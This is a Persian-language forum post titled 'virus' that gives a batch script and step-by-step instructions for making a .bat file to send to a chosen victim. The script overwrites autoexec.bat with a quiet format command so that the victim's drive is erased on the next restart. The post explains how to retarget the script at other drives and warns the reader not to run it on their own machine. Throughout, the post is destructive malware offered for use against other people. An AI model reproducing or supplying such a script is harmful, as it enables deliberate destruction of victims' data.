ويروس

در اين بخش مي‌توانيد در مورد ديگر مباحث کامپيوتر به بحث بپردازيد

مدیران انجمن: MASTER, شوراي نظارت

ارسال پست
New Member
پست: 1
تاریخ عضویت: شنبه 13 بهمن 1386, 6:14 pm
محل اقامت: farzad_1375a@yahoo.com
تماس:

ويروس

پست توسط farzad1375a »

این بار قصد داریم برای شما یک ترفند دیگه رو بازگو کنیم که با استفاده از آن میتوانید از طریق Notepad ویندوز یک فایل بسازید و آن را برای شخص مورد نظر بفرستید و کافی است فرد مورد نظر فایل را یکبار اجرا کند و آنگاه یکی از درایو هایی که شما تعیین کرده اید فرمت خواهد شد!

بدین منظور:

ابتدا برنامه Notepad ویندوز را اجرا کنید.سپس با استفاده از فرمان کپی و پیست کدهای زیر را در محیط برنامه کپی کنید:

@ echo off
call attrib -r -h c:autoexec.bat > nul
echo @echo off > c:autoexec.bat
echo format /autotest c:/q > nul >> c:autoexec.bat
call attrib +r +h c:autoexec.bat > nul
exit

حال از منوی File بر روی Save as کلیک کنید.از منوی کشویی Save as type گزینه All Files را انتخاب کنید.در قسمت File Name عبارت *.txt را پاک کنید و به جای آن نام دلخواه خود را تایپ کرده و پسوند .bat را به انتهای آن اضافه کنید.به طور مثال tarfand2009.bat
سپس مکان مورد نظر را برای ذخیره فایل را مشخص کنید و روی دکمه Save کلیک کنید.اکنون ویروس شما آماده است و فقط کافی است یکبار پس از اجرای فایل،سیستم restart شود تا فایل فعال شود.
اما به چند نکته توجه کنید:
عبارتی که شما کپی کردید(تایپ کردید) برای فرمت درایو C میباشد.برای تعویض آن کافی است در خطوط 2 و 3 و 4 و 5 در جایی که نوشته است c شما به جای c نام درایو مورد نظرتان را بنویسید.دقت هم کنید که ابدأ به روی فایلی که ساخته اید کلیک نکنید،چرا که آنوقت باید با درایو خودتون خداحافظی کنید!
اما به نظر شما این فایل چگونه کار میکند؟
روش کار این فایل بدین شکل است که ابتدا محتویات فایل autoexe.bat که یک فایل ویندوزی است را پاک میکند و سپس کد ' format /autotest c:/q ' را در داخلش جایگزین میکنه.به همین سبب پس از restart کامپیوتر درایو شما فرمت میشود. :-O
ارسال پست

بازگشت به “متفرقه در مورد کامپيوتر”